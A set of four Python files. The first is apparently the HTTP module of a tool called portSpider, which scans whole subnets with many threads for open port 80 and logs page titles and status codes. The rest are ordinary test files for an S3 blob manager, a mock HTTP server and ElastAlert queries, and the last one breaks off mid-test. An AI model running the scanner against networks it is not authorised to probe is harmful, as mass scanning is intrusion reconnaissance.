http.py
import socket
import requests
from lxml.html import fromstring
import datetime
import sys
import ipaddress
import threading
import os
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[1;94m', '\033[1;91m', '\33[1;97m', '\33[1;93m', '\033[1;35m', '\033[1;32m', '\033[0m'
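# portSpider HTTP module: scans every host in the configured subnet for an open port 80,
# then grabs the page title and HTTP status code of each host that answers.
# ThreadManager hands the next IP in the list to whichever worker thread asks for it.
# Note: self.i is not guarded by a lock, so concurrent workers can occasionally race on the same index.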
class ThreadManager(object):
i = 0
def __init__(self, ipList):
self.allIps = ipList
self.size = len(ipList)
def getNextIp(self):
if self.i < self.size:
ip = self.allIps[self.i]
self.i += 1
return ip
return 0
def getID(self):
return min(self.i + 1, self.size)
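# Module options as [name, description, default value]; core() reads the chosen values from index 2 of each row.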
def coreOptions():
options = [["network", "IP range to scan", ""], ["port-timeout", "Timeout (in sec) for port 80.", "0.3"],
["title-timeout", "Timeout (in sec) for title resolve.", "3"], ["threads", "Number of threads to run.", "50"],
["verbose", "Show verbose output.", "true"]]
return options
def createIPList(network):
net4 = ipaddress.ip_network(network)
ipList = []
for x in net4.hosts():
ipList.append(x)
return ipList
def print1(data):
if verbose:
print(data)
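# TCP connect check: True if the port accepts a connection within portTimeout,
# False if it is closed or the connection times out, "FAIL" on any other error.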
def checkServer(address, port):
s = socket.socket()
s.settimeout(float(portTimeout))
try:
s.connect((address, port))
s.close()
return True
except socket.error:
s.close()
return False
except:
s.close()
return "FAIL"
def getHTTP(address, port):
code = None
title = None
try:
r = requests.get("http://" + address, timeout=float(titleTimeout), allow_redirects=True)
except:
return False
try:
code = r.status_code
except:
pass
try:
tree = fromstring(r.content)
title = tree.findtext('.//title')
except:
pass
return [title, code]
def writeToFile(line):
file = open(fileName, "a")
file.write(line)
file.close()
def restart_line():
sys.stdout.write('\r')
sys.stdout.flush()
def statusWidget():
sys.stdout.write(GREEN + "[" + status + "] " + YELLOW + str(threadManager.getID()) + GREEN + " / " + YELLOW + str(
allIPs) + GREEN + " hosts done." + END)
restart_line()
sys.stdout.flush()
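# Worker loop: each thread pulls IPs from threadManager until the list is exhausted, probes port 80,
# and for open hosts resolves the HTTP title/status and queues a log line.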
def scan(i):
global status
global openPorts
global done
while True:
if stop:
sys.exit()
ip = threadManager.getNextIp()
if ip == 0:
break
status = (threadManager.getID() / allIPs) * 100
status = format(round(status, 2))
status = str(status) + "%"
stringIP = str(ip)
isUp = checkServer(stringIP, port)
if isUp != "FAIL":
if isUp:
openPorts = openPorts + 1
print1(GREEN + "[+] Port 80 is open on '" + stringIP + "'" + END)
http = getHTTP(stringIP, 80)
if not http:
print1(YELLOW + "[!] Failed to get the HTTP response of '" + stringIP + "'" + END)
title = "NO-TITLE"
code = "NO-CODE"
else:
title = str(http[0])
code = str(http[1])
if code is not None:
print1(GREEN + "[+] Response code of '" + stringIP + "': '" + code + "'" + END)
else:
print1(YELLOW + "[!] Failed to get the response code of '" + stringIP + "'" + YELLOW)
code = "NO-CODE"
if title is not None:
title = title.replace("\n", "")
try:
print1(GREEN + "[+] Title of '" + stringIP + "': '" + title + "'" + END)
except:
print1(YELLOW + "[!] Failed to print title of '" + stringIP + "'" + END)
title = "NO-TITLE"
else:
print1(YELLOW + "[!] Failed to get title of '" + stringIP + "'" + YELLOW)
title = "NO-TITLE"
logLine = stringIP + " - " + "80 OPEN" + " - " + code + " - " + title + "\n"
logLines.append(logLine)
elif not isUp:
print1(RED + "[-] Port 80 is closed on '" + stringIP + "'" + END)
else:
print1(RED + "[!] Failed connecting to '" + stringIP + "'" + END)
done = done + 1
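# Entry point: reads the option table, spawns the worker threads, shows a live status line until
# every host has been handled, then flushes the collected log lines to a timestamped file under logs/.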
def core(moduleOptions):
print(
"\n" + GREEN + "HTTP module by @xdavidhu. Scanning subnet '" + YELLOW + moduleOptions[0][2] + GREEN + "'...\n")
global status
global fileName
global allIPs
global portTimeout
global titleTimeout
global ips
global threadCount
global done
global verbose
global stop
global port
global openPorts
global logLines
global threadManager
logLines = []
stop = False
done = 0
portTimeout = moduleOptions[1][2]
titleTimeout = moduleOptions[2][2]
network = moduleOptions[0][2]
threadCount = int(moduleOptions[3][2])
verbose = moduleOptions[4][2]
if verbose == "true":
verbose = True
else:
verbose = False
try:
ipList = createIPList(network)
except:
print(RED + "[!] Invalid subnet. Exiting...\n")
return
allIPs = len(ipList)
threadManager = ThreadManager(ipList)
i = datetime.datetime.now()
i = str(i).replace(" ", "_")
i = str(i).replace(":", "-")
if not os.path.exists("logs"):
os.makedirs("logs")
fileName = "logs/log-http-portSpider-" + i + ".log"
file = open(fileName, 'w')
file.write("subnet: " + network + "\n")
file.close()
port = 80
openPorts = 0
threads = []
for i in range(threadCount):
t = threading.Thread(target=scan, args=(i,))
t.daemon = True
threads.append(t)
t.start()
try:
while True:
if done == threadCount and threadManager.getID() == allIPs:
break
statusWidget()
except KeyboardInterrupt:
stop = True
verbose = False
print("\n" + RED + "[I] Stopping..." + END)
stop = True
verbose = False
for logLine in logLines:
try:
writeToFile(logLine)
except:
writeToFile("WRITING-ERROR")
print("\n\n" + GREEN + "[I] HTTP module done. Results saved to '" + YELLOW + fileName + GREEN + "'.\n")
test_s3_blob_manager.py
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import threading
import unittest
from unittest import mock
from ai_flow.plugin_interface.blob_manager_interface import BlobConfig, BlobManagerFactory
from ai_flow.util.path_util import get_file_dir
from ai_flow_plugins.blob_manager_plugins.s3_blob_manager import S3BlobManager
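# The upload/download test below only runs when the blob_server.* environment variables point at a
# reachable S3-compatible endpoint; otherwise it is skipped.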
class TestS3BlobManager(unittest.TestCase):
@unittest.skipUnless((os.environ.get('blob_server.service_name') is not None
and os.environ.get('blob_server.region_name') is not None
and os.environ.get('blob_server.api_version') is not None
and os.environ.get('blob_server.use_ssl') is not None
and os.environ.get('blob_server.verify') is not None
and os.environ.get('blob_server.endpoint_url') is not None
and os.environ.get('blob_server.access_key_id') is not None
and os.environ.get('blob_server.secret_access_key') is not None
and os.environ.get('blob_server.bucket_name') is not None), 'need set s3')
def test_project_upload_download_s3(self):
project_path = get_file_dir(__file__)
config = {
'blob_manager_class': 'ai_flow_plugins.blob_manager_plugins.s3_blob_manager.S3BlobManager',
'blob_manager_config': {
'service_name': os.environ.get('blob_server.service_name'),
'region_name': os.environ.get('blob_server.region_name'),
'api_version': os.environ.get('blob_server.api_version'),
'use_ssl': os.environ.get('blob_server.use_ssl'),
'verify': os.environ.get('blob_server.verify'),
'endpoint_url': os.environ.get('blob_server.endpoint_url'),
'access_key_id': os.environ.get('blob_server.access_key_id'),
'secret_access_key': os.environ.get('blob_server.secret_access_key'),
'bucket_name': os.environ.get('blob_server.bucket_name'),
'local_repository': '/tmp'
}
}
blob_config = BlobConfig(config)
blob_manager = BlobManagerFactory.create_blob_manager(
blob_config.blob_manager_class(), blob_config.blob_manager_config())
uploaded_path = blob_manager.upload_project('1', project_path)
downloaded_path = blob_manager.download_project('1', uploaded_path)
self.assertEqual('/tmp/workflow_1_project/project', downloaded_path)
def test_concurrent_download_s3_file(self):
project_zip = '/tmp/workflow_1_project.zip'
if os.path.exists(project_zip):
os.remove(project_zip)
config = {'service_name': 's3'}
s3_blob_manager = S3BlobManager(config)
zip_file_path = None
call_count = 0
def mock_get_s3_object(local_path, object_key):
nonlocal zip_file_path, call_count
call_count += 1
zip_file_path = local_path
with open(local_path, 'w') as f:
pass
s3_blob_manager._get_s3_object = mock_get_s3_object
with mock.patch(
'ai_flow_plugins.blob_manager_plugins.s3_blob_manager.extract_project_zip_file'):
def download_loop():
for i in range(1000):
s3_blob_manager.download_project('1', 'dummy_path', '/tmp')
try:
t1 = threading.Thread(target=download_loop)
t1.start()
download_loop()
t1.join()
self.assertEqual(1, call_count)
finally:
if zip_file_path:
os.remove(zip_file_path)
def test__get_s3_object_retry(self):
config = {'service_name': 's3'}
s3_blob_manager = S3BlobManager(config)
with mock.patch.object(s3_blob_manager, 's3_client') as mock_client:
mock_client.download_fileobj.side_effect = [RuntimeError("boom"), RuntimeError("boom"),
RuntimeError("boom")]
with self.assertRaises(RuntimeError):
s3_blob_manager._get_s3_object('dummy_dest', 'key', retry_sleep_sec=0.1)
self.assertEqual(3, mock_client.download_fileobj.call_count)
if __name__ == '__main__':
unittest.main()
testsuite_utils.py
"""
testsuite_utils.py
Methods used throughout the test suite for testing.
"""
import socket
from threading import Thread
try: # python 2
from BaseHTTPServer import HTTPServer
except ImportError: # python 3
from http.server import HTTPServer
def get_free_port():
""" Find a free port
Return a port available for connecting on localhost.
"""
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(("localhost", 0))
addr, port = s.getsockname()
s.close()
return port
class MockServer(object):
""" Mock server
Run an HTTP server as a daemon in a thread.
"""
@classmethod
def serve(cls, http_server):
""" Set up mock server
INPUTS
-------
http_server: BaseHTTPRequestHandler
Request handler class with the desired request handlers defined
"""
# Find a free port to listen on.
cls.mock_server_port = get_free_port()
# Instantiate server.
cls.mock_server = \
HTTPServer(("localhost", cls.mock_server_port), http_server)
cls.mock_server_thread = Thread(target=cls.mock_server.serve_forever)
cls.mock_server_thread.daemon = True
cls.mock_server_thread.start()
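# Usage sketch (hypothetical handler; BaseHTTPRequestHandler comes from http.server / BaseHTTPServer):
#   class Handler(BaseHTTPRequestHandler):
#       def do_GET(self):
#           self.send_response(200)
#           self.end_headers()
#   MockServer.serve(Handler)
#   # the mock server now answers on http://localhost:<MockServer.mock_server_port>/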
base_test.py
# -*- coding: utf-8 -*-
import copy
import datetime
import json
import threading
import elasticsearch
import mock
import pytest
from elasticsearch.exceptions import ConnectionError
from elasticsearch.exceptions import ElasticsearchException
from elastalert.enhancements import BaseEnhancement
from elastalert.enhancements import DropMatchException
from elastalert.kibana import dashboard_temp
from elastalert.util import dt_to_ts
from elastalert.util import dt_to_unix
from elastalert.util import dt_to_unixms
from elastalert.util import EAException
from elastalert.util import ts_now
from elastalert.util import ts_to_dt
from elastalert.util import unix_to_dt
START_TIMESTAMP = '2014-09-26T12:34:45Z'
END_TIMESTAMP = '2014-09-27T12:34:45Z'
START = ts_to_dt(START_TIMESTAMP)
END = ts_to_dt(END_TIMESTAMP)
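# The `ea` / `ea_sixsix` arguments used throughout are pytest fixtures (mocked ElastAlerter instances)
# supplied by the test suite's conftest.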
def _set_hits(ea_inst, hits):
res = {'hits': {'total': len(hits), 'hits': hits}}
ea_inst.client_es.return_value = res
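# Build a fake Elasticsearch search response: one hit per timestamp, with any extra keyword
# arguments copied into each hit's _source.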
def generate_hits(timestamps, **kwargs):
hits = []
for i, ts in enumerate(timestamps):
data = {'_id': 'id{}'.format(i),
'_source': {'@timestamp': ts},
'_type': 'logs',
'_index': 'idx'}
for key, item in kwargs.items():
data['_source'][key] = item
# emulate process_hits(), add metadata to _source
for field in ['_id', '_type', '_index']:
data['_source'][field] = data[field]
hits.append(data)
return {'hits': {'total': len(hits), 'hits': hits}}
def assert_alerts(ea_inst, calls):
""" Takes a list of lists of timestamps. Asserts that an alert was called for each list, containing those timestamps. """
assert ea_inst.rules[0]['alert'][0].alert.call_count == len(calls)
for call_num, call_args in enumerate(ea_inst.rules[0]['alert'][0].alert.call_args_list):
assert not any([match['@timestamp'] not in calls[call_num] for match in call_args[0][0]])
assert len(call_args[0][0]) == len(calls[call_num])
def test_starttime(ea):
invalid = ['2014-13-13',
'2014-11-24T30:00:00',
'Not A Timestamp']
for ts in invalid:
with pytest.raises((TypeError, ValueError)):
ts_to_dt(ts)
def test_init_rule(ea):
# Simulate state of a rule just loaded from a file
ea.rules[0]['minimum_starttime'] = datetime.datetime.now()
new_rule = copy.copy(ea.rules[0])
list(map(new_rule.pop, ['agg_matches', 'current_aggregate_id', 'processed_hits', 'minimum_starttime']))
# Properties are copied from ea.rules[0]
ea.rules[0]['starttime'] = '2014-01-02T00:11:22'
ea.rules[0]['processed_hits'] = ['abcdefg']
new_rule = ea.init_rule(new_rule, False)
for prop in ['starttime', 'agg_matches', 'current_aggregate_id', 'processed_hits', 'minimum_starttime', 'run_every']:
assert new_rule[prop] == ea.rules[0][prop]
# Properties are fresh
new_rule = ea.init_rule(new_rule, True)
new_rule.pop('starttime')
assert 'starttime' not in new_rule
assert new_rule['processed_hits'] == {}
# Assert run_every is unique
new_rule['run_every'] = datetime.timedelta(seconds=17)
new_rule = ea.init_rule(new_rule, True)
assert new_rule['run_every'] == datetime.timedelta(seconds=17)
def test_query(ea):
ea.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
ea.thread_data.current_es.search.assert_called_with(body={
'query': {'filtered': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'],
ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_query_sixsix(ea_sixsix):
ea_sixsix.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea_sixsix.run_query(ea_sixsix.rules[0], START, END)
ea_sixsix.thread_data.current_es.search.assert_called_with(body={
'query': {'bool': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'],
ignore_unavailable=True,
size=ea_sixsix.rules[0]['max_query_size'], scroll=ea_sixsix.conf['scroll_keepalive'])
def test_query_with_fields(ea):
ea.rules[0]['_source_enabled'] = False
ea.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
ea.thread_data.current_es.search.assert_called_with(body={
'query': {'filtered': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}], 'fields': ['@timestamp']}, index='idx', ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_query_sixsix_with_fields(ea_sixsix):
ea_sixsix.rules[0]['_source_enabled'] = False
ea_sixsix.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea_sixsix.run_query(ea_sixsix.rules[0], START, END)
ea_sixsix.thread_data.current_es.search.assert_called_with(body={
'query': {'bool': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}], 'stored_fields': ['@timestamp']}, index='idx',
ignore_unavailable=True,
size=ea_sixsix.rules[0]['max_query_size'], scroll=ea_sixsix.conf['scroll_keepalive'])
def test_query_with_unix(ea):
ea.rules[0]['timestamp_type'] = 'unix'
ea.rules[0]['dt_to_ts'] = dt_to_unix
ea.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
start_unix = dt_to_unix(START)
end_unix = dt_to_unix(END)
ea.thread_data.current_es.search.assert_called_with(
body={'query': {'filtered': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': end_unix, 'gt': start_unix}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'],
ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_query_sixsix_with_unix(ea_sixsix):
ea_sixsix.rules[0]['timestamp_type'] = 'unix'
ea_sixsix.rules[0]['dt_to_ts'] = dt_to_unix
ea_sixsix.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea_sixsix.run_query(ea_sixsix.rules[0], START, END)
start_unix = dt_to_unix(START)
end_unix = dt_to_unix(END)
ea_sixsix.thread_data.current_es.search.assert_called_with(
body={'query': {'bool': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': end_unix, 'gt': start_unix}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'],
ignore_unavailable=True,
size=ea_sixsix.rules[0]['max_query_size'], scroll=ea_sixsix.conf['scroll_keepalive'])
def test_query_with_unixms(ea):
ea.rules[0]['timestamp_type'] = 'unixms'
ea.rules[0]['dt_to_ts'] = dt_to_unixms
ea.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
start_unix = dt_to_unixms(START)
end_unix = dt_to_unixms(END)
ea.thread_data.current_es.search.assert_called_with(
body={'query': {'filtered': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': end_unix, 'gt': start_unix}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'],
ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_query_sixsix_with_unixms(ea_sixsix):
ea_sixsix.rules[0]['timestamp_type'] = 'unixms'
ea_sixsix.rules[0]['dt_to_ts'] = dt_to_unixms
ea_sixsix.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea_sixsix.run_query(ea_sixsix.rules[0], START, END)
start_unix = dt_to_unixms(START)
end_unix = dt_to_unixms(END)
ea_sixsix.thread_data.current_es.search.assert_called_with(
body={'query': {'bool': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': end_unix, 'gt': start_unix}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'],
ignore_unavailable=True,
size=ea_sixsix.rules[0]['max_query_size'], scroll=ea_sixsix.conf['scroll_keepalive'])
def test_no_hits(ea):
ea.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_data.call_count == 0
def test_no_terms_hits(ea):
ea.rules[0]['use_terms_query'] = True
ea.rules[0]['query_key'] = 'QWERTY'
ea.rules[0]['doc_type'] = 'uiop'
ea.thread_data.current_es.deprecated_search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_terms_data.call_count == 0
def test_some_hits(ea):
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
hits_dt = generate_hits([START, END])
ea.thread_data.current_es.search.return_value = hits
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_data.call_count == 1
ea.rules[0]['type'].add_data.assert_called_with([x['_source'] for x in hits_dt['hits']['hits']])
def test_some_hits_unix(ea):
ea.rules[0]['timestamp_type'] = 'unix'
ea.rules[0]['dt_to_ts'] = dt_to_unix
ea.rules[0]['ts_to_dt'] = unix_to_dt
hits = generate_hits([dt_to_unix(START), dt_to_unix(END)])
hits_dt = generate_hits([START, END])
ea.thread_data.current_es.search.return_value = copy.deepcopy(hits)
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_data.call_count == 1
ea.rules[0]['type'].add_data.assert_called_with([x['_source'] for x in hits_dt['hits']['hits']])
def _duplicate_hits_generator(timestamps, **kwargs):
"""Generator repeatedly returns identical hits dictionaries
"""
while True:
yield generate_hits(timestamps, **kwargs)
def test_duplicate_timestamps(ea):
ea.thread_data.current_es.search.side_effect = _duplicate_hits_generator([START_TIMESTAMP] * 3, blah='duplicate')
ea.run_query(ea.rules[0], START, ts_to_dt('2014-01-01T00:00:00Z'))
assert len(ea.rules[0]['type'].add_data.call_args_list[0][0][0]) == 3
assert ea.rules[0]['type'].add_data.call_count == 1
# Run the query again, duplicates will be removed and not added
ea.run_query(ea.rules[0], ts_to_dt('2014-01-01T00:00:00Z'), END)
assert ea.rules[0]['type'].add_data.call_count == 1
def test_match(ea):
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
ea.thread_data.current_es.search.return_value = hits
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
ea.rules[0]['alert'][0].alert.called_with({'@timestamp': END_TIMESTAMP})
assert ea.rules[0]['alert'][0].alert.call_count == 1
def test_run_rule_calls_garbage_collect(ea):
start_time = '2014-09-26T00:00:00Z'
end_time = '2014-09-26T12:00:00Z'
ea.buffer_time = datetime.timedelta(hours=1)
ea.run_every = datetime.timedelta(hours=1)
with mock.patch.object(ea.rules[0]['type'], 'garbage_collect') as mock_gc, \
mock.patch.object(ea, 'run_query'):
ea.run_rule(ea.rules[0], ts_to_dt(end_time), ts_to_dt(start_time))
# Running ElastAlert every hour for 12 hours, we should see self.garbage_collect called 12 times.
assert mock_gc.call_count == 12
# The calls should be spaced 1 hour apart
expected_calls = [ts_to_dt(start_time) + datetime.timedelta(hours=i) for i in range(1, 13)]
for e in expected_calls:
mock_gc.assert_any_call(e)
def run_rule_query_exception(ea, mock_es):
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es_init:
mock_es_init.return_value = mock_es
ea.run_rule(ea.rules[0], END, START)
# Assert neither add_data nor garbage_collect were called
# and that starttime did not change
assert ea.rules[0].get('starttime') == START
assert ea.rules[0]['type'].add_data.call_count == 0
assert ea.rules[0]['type'].garbage_collect.call_count == 0
assert ea.rules[0]['type'].add_count_data.call_count == 0
def test_query_exception(ea):
mock_es = mock.Mock()
mock_es.search.side_effect = ElasticsearchException
run_rule_query_exception(ea, mock_es)
def test_query_exception_count_query(ea):
ea.rules[0]['use_count_query'] = True
ea.rules[0]['doc_type'] = 'blahblahblahblah'
mock_es = mock.Mock()
mock_es.count.side_effect = ElasticsearchException
run_rule_query_exception(ea, mock_es)
def test_match_with_module(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
test_match(ea)
mod.process.assert_called_with({'@timestamp': END, 'num_hits': 0, 'num_matches': 1})
def test_match_with_module_from_pending(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
ea.rules[0].pop('aggregation')
pending_alert = {'match_body': {'foo': 'bar'}, 'rule_name': ea.rules[0]['name'],
'alert_time': START_TIMESTAMP, '@timestamp': START_TIMESTAMP}
# First call, return the pending alert, second, no associated aggregated alerts
ea.writeback_es.deprecated_search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_index': 'wb', '_source': pending_alert}]}},
{'hits': {'hits': []}}]
ea.send_pending_alerts()
assert mod.process.call_count == 0
# If aggregation is set, enhancement IS called
pending_alert = {'match_body': {'foo': 'bar'}, 'rule_name': ea.rules[0]['name'],
'alert_time': START_TIMESTAMP, '@timestamp': START_TIMESTAMP}
ea.writeback_es.deprecated_search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_index': 'wb', '_source': pending_alert}]}},
{'hits': {'hits': []}}]
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.send_pending_alerts()
assert mod.process.call_count == 1
def test_match_with_module_with_agg(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=15)
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
ea.thread_data.current_es.search.return_value = hits
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert mod.process.call_count == 0
def test_match_with_enhancements_first(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=15)
ea.rules[0]['run_enhancements_first'] = True
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
ea.thread_data.current_es.search.return_value = hits
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch.object(ea, 'add_aggregated_alert') as add_alert:
ea.run_rule(ea.rules[0], END, START)
mod.process.assert_called_with({'@timestamp': END, 'num_hits': 0, 'num_matches': 1})
assert add_alert.call_count == 1
# Assert that DropMatchException behaves properly
mod.process = mock.MagicMock(side_effect=DropMatchException)
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch.object(ea, 'add_aggregated_alert') as add_alert:
ea.run_rule(ea.rules[0], END, START)
mod.process.assert_called_with({'@timestamp': END, 'num_hits': 0, 'num_matches': 1})
assert add_alert.call_count == 0
def test_agg_matchtime(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45']
alerttime1 = dt_to_ts(ts_to_dt(hits_timestamps[0]) + datetime.timedelta(minutes=10))
hits = generate_hits(hits_timestamps)
ea.thread_data.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es:
# Aggregate first two, query over full range
mock_es.return_value = ea.thread_data.current_es
ea.rules[0]['aggregate_by_match_time'] = True
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to Elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['@timestamp'] == '2014-09-26T12:34:45'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert call1['alert_time'] == alerttime1
assert call2['match_body']['@timestamp'] == '2014-09-26T12:40:45'
assert not call2['alert_sent']
assert call2['aggregate_id'] == 'ABCD'
assert call3['match_body']['@timestamp'] == '2014-09-26T12:47:45'
assert not call3['alert_sent']
assert 'aggregate_id' not in call3
# First call - Find all pending alerts (only entries without agg_id)
# Second call - Find matches with agg_id == 'ABCD'
# Third call - Find matches with agg_id == 'CDEF'
ea.writeback_es.deprecated_search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_index': 'wb', '_source': call1},
{'_id': 'CDEF', '_index': 'wb', '_source': call3}]}},
{'hits': {'hits': [{'_id': 'BCDE', '_index': 'wb', '_source': call2}]}},
{'hits': {'total': 0, 'hits': []}}]
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es:
ea.send_pending_alerts()
# Assert that current_es was refreshed from the aggregate rules
assert mock_es.called_with(host='', port='')
assert mock_es.call_count == 2
assert_alerts(ea, [hits_timestamps[:2], hits_timestamps[2:]])
call1 = ea.writeback_es.deprecated_search.call_args_list[7][1]['body']
call2 = ea.writeback_es.deprecated_search.call_args_list[8][1]['body']
call3 = ea.writeback_es.deprecated_search.call_args_list[9][1]['body']
call4 = ea.writeback_es.deprecated_search.call_args_list[10][1]['body']
assert 'alert_time' in call2['filter']['range']
assert call3['query']['query_string']['query'] == 'aggregate_id:ABCD'
assert call4['query']['query_string']['query'] == 'aggregate_id:CDEF'
assert ea.writeback_es.deprecated_search.call_args_list[9][1]['size'] == 1337
def test_agg_not_matchtime(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45']
match_time = ts_to_dt('2014-09-26T12:55:00Z')
hits = generate_hits(hits_timestamps)
ea.thread_data.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch('elastalert.elastalert.ts_now', return_value=match_time):
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to Elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['@timestamp'] == '2014-09-26T12:34:45'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert call1['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
assert call2['match_body']['@timestamp'] == '2014-09-26T12:40:45'
assert not call2['alert_sent']
assert call2['aggregate_id'] == 'ABCD'
assert call3['match_body']['@timestamp'] == '2014-09-26T12:47:45'
assert not call3['alert_sent']
assert call3['aggregate_id'] == 'ABCD'
def test_agg_cron(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45']
hits = generate_hits(hits_timestamps)
ea.thread_data.current_es.search.return_value = hits
alerttime1 = dt_to_ts(ts_to_dt('2014-09-26T12:46:00'))
alerttime2 = dt_to_ts(ts_to_dt('2014-09-26T13:04:00'))
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch('elastalert.elastalert.croniter.get_next') as mock_ts:
# Aggregate first two, query over full range
mock_ts.side_effect = [dt_to_unix(ts_to_dt('2014-09-26T12:46:00')),
dt_to_unix(ts_to_dt('2014-09-26T13:04:00'))]
ea.rules[0]['aggregation'] = {'schedule': '*/5 * * * *'}
